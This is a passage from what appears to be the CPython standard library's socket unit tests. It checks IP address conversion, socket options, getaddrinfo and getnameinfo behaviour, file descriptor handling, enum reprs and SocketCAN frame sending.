b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(repr(family), '<AddressFamily.AF_INET: %r>' % family.value)
self.assertEqual(str(family), str(family.value))
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(repr(type), '<SocketKind.SOCK_STREAM: %r>' % type.value)
self.assertEqual(str(type), str(type.value))
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(repr(s.family), '<AddressFamily.AF_INET: %r>' % s.family.value)
self.assertEqual(repr(s.type), '<SocketKind.SOCK_STREAM: %r>' % s.type.value)
self.assertEqual(str(s.family), str(s.family.value))
self.assertEqual(str(s.type), str(s.type.value))
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
def test_addressfamily_enum(self):
import _socket, enum
CheckedAddressFamily = enum._old_convert_(
enum.IntEnum, 'AddressFamily', 'socket',
lambda C: C.isupper() and C.startswith('AF_'),
source=_socket,
)
enum._test_simple_enum(CheckedAddressFamily, socket.AddressFamily)
def test_socketkind_enum(self):
import _socket, enum
CheckedSocketKind = enum._old_convert_(
enum.IntEnum, 'SocketKind', 'socket',
lambda C: C.isupper() and C.startswith('SOCK_'),
source=_socket,
)
enum._test_simple_enum(CheckedSocketKind, socket.SocketKind)
def test_msgflag_enum(self):
import _socket, enum
CheckedMsgFlag = enum._old_convert_(
enum.IntFlag, 'MsgFlag', 'socket',
lambda C: C.isupper() and C.startswith('MSG_'),
source=_socket,
)
enum._test_simple_enum(CheckedMsgFlag, socket.MsgFlag)
def test_addressinfo_enum(self):
import _socket, enum
CheckedAddressInfo = enum._old_convert_(
enum.IntFlag, 'AddressInfo', 'socket',
lambda C: C.isupper() and C.startswith('AI_'),
source=_socket)
enum._test_simple_enum(CheckedAddressInfo, socket.AddressInfo)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
